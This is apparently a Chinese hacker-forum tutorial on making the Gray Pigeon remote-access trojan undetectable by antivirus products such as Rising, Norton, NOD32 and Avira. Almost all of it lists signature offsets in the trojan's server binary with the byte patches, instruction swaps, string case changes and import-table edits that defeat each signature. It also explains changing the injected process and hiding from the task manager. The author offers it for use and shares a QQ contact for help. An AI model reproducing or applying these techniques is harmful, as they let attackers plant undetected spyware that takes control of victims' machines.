------
“大家好,我是冰帝团队的德才兼备,本人QQ:710920465 现在提交考试教程,希管理批”
给大家带一个黑防灰鸽子特征码关键几处影响到灰鸽子使用修改方法。。,下面的特征码主要是针对瑞星的,生成能过表明,内存,主动防御。。。
现在开始吧,看操作,特征码真的太多了。我改得都吐血了,我只演示几处关键的地方,有兴趣的朋友可以安照我下面说的改,自己测试,绝对没有问题的。。。有不懂的可以加我QQ,
先看我原版鸽子配置测试吧 。。。 那些是刚才弄过鸽子原因 没关系的。。主要看这个 功能正常的
一.改插入进程
搜索关键字\Program Files\Internet Explorer\IEXPLORE.EXE
修改成为 \Program Files\Outlook Express\msimn.exe.....
\WINDOWS\system32\svchost.exe................
\Windows\System32\Winlogon.exe
IEXPLORE.EXE
Winlogon.exe
另外一处IEXPLORE.EXE修改成为msimn.exe 否则不能上线
C:\Program Files\Outlook Express\msimn.exe------消息广播不能发送 这里修改 影响这个的 看我演示
看 没消息了。。。。
不好意思
黑防专版 ----沉默远控 德才兼备
灰鸽子远程控制服务端安装----书山有路勤为径学海无涯苦
系统芯片----我爱的心
物理内存---智脑内心
Windows版本----xiaojun型号
Windows目录----xiaojun路径
注册公司-----我的女人
注册用户---我的玫瑰------------------------主动特征码:0009F4E3_00000002
当前用户----现在的你
当前日期----现在日子
开机时间----恋爱时候
计算机名称---我的爱人是
窗口分辨率----女人好看否
剪切板内容为空或非文本信息---------学海无涯古作舟咋能没结果
打开文件失败-----无法显示爱情
无插件----没外遇
-------------无法在任务管理器里面隐藏
56 00 43 00 32 00 35 00 50 00 4A 00 55 00 4C 00 30 00 VC259JUL03 (用0填充)
删除 DVCLAL
0x0005FCA2 u--U 55---75
0x0005FE1A BF F1 正在传送数据
0x0009F552 3A--3B 机名称:---;
0x000A0B5B 09---FF 20--00----- if exit uninstal.bat 无法自动删除 360报告灰 鸽子变种残留(006).此处修改会导致无法自动删除 uninstal.bat 文件
0x000B7C3E 65--45 72没找到
0x000B7E15 00-- FF
0x000B9097 000b96d0h: -----上线加密
金山
[特征] 000A0AF7_00000001 004A16F7 向后偏移两字节
[特征] 000A1257_00000001 004A1E57 改上面1E48的mov ecx,5 反映变慢
重装了个另外版的瑞星,原来免费2008版本免杀的就被杀了 02---00 --05??
-------------------------------------------------------------(1)
[特征] 000A0DB8_00000001 26改27
[特征] 0008B425_00000001 50 改为 51
[特征] 000933FE_00000001 填充0
[特征] 00094B3E_00000001 01改02 远程视频断开,无法使用 再看这一处吧。 按照网上的方法 会影响 视频监控的哦 。。看我改
[特征] 000973EA_00000001 填充0
[特征] 0009A8A3_00000001 13改14 停止代理的时候 没有反映 出错了。。。动不了
[特征] 0009AD0D_00000001 38改37 代理无法正常运行
[特征] 0009CBBC_00000001 DB 改为DE 代理无法正常运行
[特征] 0009DC3E_00000001 07 改06
[特征] 0009EC44_00000001 填充0 无法使用代理功能。。。
[特征] 0009F3F6_00000001 08改07 这处会导致系统信息无法正常显示
[特征] 0009F5A7_00000001 75改76
000A14C3_00000001 4A改4B
[特征] 000B9A03_00000001 GrayPigeon 改 gRAYpIGEON 代理问题
0009B679_00000001 0049C279 16进制5A改为5C
000A158A_00000001 004A218A 修改大小写 X---x
[特征] 00069416_00000001 0046A016 16进制46改为45 还有这些 都要影响代理运行的哦,我就不具体修改了
[特征] 000A1301_00000001 004A1F01 B7改为B6 无法运行
000A0AF7_00000001 004A16F7 修改大小写 P---p 无法生成正常文件
0005FDEB_00000001 004609EB 无效的缓冲区 虚拟内存过低
0009748D_00000001 0049808D 特征码上方,黑客动画吧00改变01
[特征] 000A0DB7_00000002这一处连续的数字可以加减.把26改成27 找不到。。。74
[特征] 0009BBB7_00000002跳到这一处是字母.可以修改大小写 r--R
起始偏移 000B9A4D 偏移大小 00000007 大小写反转000B9A4D_000B9A54
-------------------------------------------------------------------------(2)
[特征] 00006DE7_00000001 004079E7 mov dword ptr [edx], eax movsx eax, word ptr [esp] 调换位置
[特征] 0005FCA9_00000001 004608A9 xor 改为or 004608A9
[特征] 0005FCB5_00000001 004608B5 TEST ESI, ESI 改位 XOR ESI, ESI
[特征] 00091C26_00000001 00492826 POP ESI POP EDI 互换位置
[特征] 00099481_00000001 0049A081 OR EAX, 595AC033 改 XOR EAX, 595AC033
[特征] 0009A87A_00000001 0049B47A push 0 改为push 6
[特征] 000A0DD2_00000001 004A19D2 push -1 改位 psuh -2
[特征] 000A12A2_00000001 004A1EA2 test eax, eax test bl, bl test改or
[特征] 000A12A8_00000001 同上--------------没该。。
[特征] 0005FDFB_00000001 004609FB MOV EDI, D4C4B5D5 MOV DH, B3 调换位置 空的远程地址 远程地址为空---找不到
[特征] 0009AB3C_00000001 0049B73C call 0042CA70 互换位置 call 0042ca60 然后修改xor ecx ecx为or--------------------这处修改后,只能上线一次,客户端重新打开就不能上线了。。。。
[特征] 000A0A46_00000001 004A1646 注意观察寄存器的变化。
004A1644 6A 00 push 0
004A1646 6A 00 push 0
004A1648 6A 40 push 40
004A21ED 00 db 00 这一处没有修改
004A164A 90 nop
v004A164A |. 6A 00 push 0
00096F4A_00000001 00497B4A JNZ修改为JZ
0009B9C3_00000001 0049C5C3 特征码上方JNZ改为JZ
000B9A4F_00000001 004C0E4F 特征码上方小循环处的SBB改为SUB
--------------------------只上线一次???? (3)--------------------------------------------------------
--------------------
诺顿的:
0000ACEB_00000002 内存地址:0040B8EB (由je改jng)
[特征] 000A12A1_00000002用OC转换下内在地址.004A1EA1 test---or 是XOR,不修改。
00A14F4_00000001 004A20F4 一处,两行代码换位.
004A20F2 C605 647F4A00>MOV BYTE PTR DS:[4A7F64],2
004A20F9 A1 FC584A00 MOV EAX,DWORD PTR DS:[4A58FC
mov byte ptr ds:[4A7F64],1
mov eax,dword ptr ds:[4A58FC]
00094B3E_00000001 0049573E 特征码处CMP改为SUB 可以的吧,,还免杀的呢 。。
000973EA_00000001 00497FEA 特征码NOP掉后空一格汇编
0009AB3C_00000001 0049B73C 特征码NOP掉后,空一格汇编 0049B73C 8519 test dword ptr ds:[ecx],ebx
这处 不断弹处access violation at address 00403D7E in modele 'svchost.exe'.Read of address FF645754
0009CBBC_00000001 0049D7BC 特征及上面两行代码黑客动画吧NOP后空一格再黑客动画吧粘贴. E8 FB 9F F6 FF 8B D8 85 DB
0009F5A7_00000001 004A01A7 特征码NOP后空一格汇编. 004A1E49 5. 8BEC mov ebp,esp
000A0A46_00000001 004A1646
004A1644 6A 00 PUSH 0
004A1646 6A 00 PUSH 0
004A1648 6A 40 PUSH 40
004A164A 6A 00 PUSH 0
004A164C 6A 00 PUSH 0
004A164E 6A 00 PUSH 0
改为
004A1644 |. 50 PUSH EAX
004A1645 |. 6A 00 PUSH 0
004A1647 |. 6A 00 PUSH 0
004A1649 |. 6A 40 PUSH 40
004A164B |. 6A 00 PUSH 0
004A164D |. 6A 00 PUSH 0
004A164F |. 50 PUSH EAX
000A0DBF_00000001 004A19BF
004A19BC 50 PUSH EAX
004A19BD 6A 00 PUSH 0
004A19BF 6A 00 PUSH 0
改为
004A19BC |. 6A 00 PUSH 0
004A19BE |. 6A 00 PUSH 0
004A19C0 |. 50 PUSH EAX
000A12A8_00000001 004A1EA8
004A1EA7 /74 11 JE SHORT CServer.004A1EBA
004A1EA9 |C605 647F4A00>MOV BYTE PTR DS:[4A7F64],0
以上两行代码换位.
000A14C3_00000001 004A20C3
68 BC 21 4A
68 BC 20 4A
[特征] 000A0933_00000001 004A1533
[特征] 000A0A00_00000001 004A1600
一二处修改方法一样,两处CALL地址换位.
004A152E |. E8 3921F6FF CALL 0040366C
004A1533 |. E8 9413F6FF CALL 004028CC
----------------本地测试,关了客户端后,无法再次上线
Idle[PID=0],Idle
-Tcp stata=Time_wait,local 10.9.228.86:8000 Remote 10.9.227.86:1050
-state=time_wait,local 10.9.227.86:8000 remote 10.9.227.86:1049
-----------------------(4) 二次上线有点慢,功能基本都在---------------------
[特征] 0005FF3A_00000001 00460B3A TEXT --XOR,JE-JLE
[特征] 0009A86D_00000002 0049B46D OR--XOR
[特征] 0009C73F_00000002 0049D33F jnz----jmp
[特征] 0009B963_00000002 0049C563 jnz----jmp
[特征] 0009B58A_00000002 0049C18A jnz----jmp
[特征] 0009AD0D_00000001 0049B90D JE--jle
[特征] 0009B913_00000002 0049C513 jnz----jmp
[特征] 0005FDFB_00000001
004609FB C4 二进制移到00
[特征] 0005F845_00000001 00460445 PUSH -1----PUSH -2
[特征] 0005FBE0_00000001 004607E0 Jnz---jb
[特征] 000317F5_00000002 004323F5 定位出错?CALL换行
1[特征] 00012B3F_00000002 0041373F ADD改SUB
[特征] 0006D2D8_00000001 0046DED8 d--D
[特征] 000A15BF_00000001 004A21BF 00填充 5[特征] 000A15BE_00000002 字符替换法 学习(可以直接删除,0替换)
[特征] 00068BEE_00000002 修改字符串大小写法
[特征] 0009ADFE_00000001 w--W (www)
[特征] 0009ADF7_00000002 直接修改特征码的十六进制法09----08
----------------------(5)------------------------------------------------------------------
瑞星主动
[特征] 0005FFB4_00000002
[特征] 0005FFCE_00000002
未知错误代号 ---未来世界探秘
正在查找错误信息----我的心在空中飞翔
修改内核内存数据:
\Device\PhysicalMemory
nod32
[特征] 00006434_00000001 00407034 jmp dword ptr ds:[4A83E4] NOP 下移 jmp 站四个字节
0000ACEB_00000002 内存地址:0040B8EB (由je改jng)
小红伞
[特征] 000B27AC_00000001 上面
BBCANCEL
BBIGNORE 上下字符互换
文件地址 内存地址 文件字符串 函数指针地址
7[特征] 000A6EFB_00000002 004AACFB ShellExecuteA 输入表函数调整对应内存地址004A89A0,文件地址000A4BA0对应的指针EE----ED
8[特征] 000A6F2B_00000002 004AAD2B InternetOpenUrlA 输入表函数调整000A4BAC
9[特征] 000A695F_00000002 004AA75F FindWindowA 输入表函数调整000A4A60 |
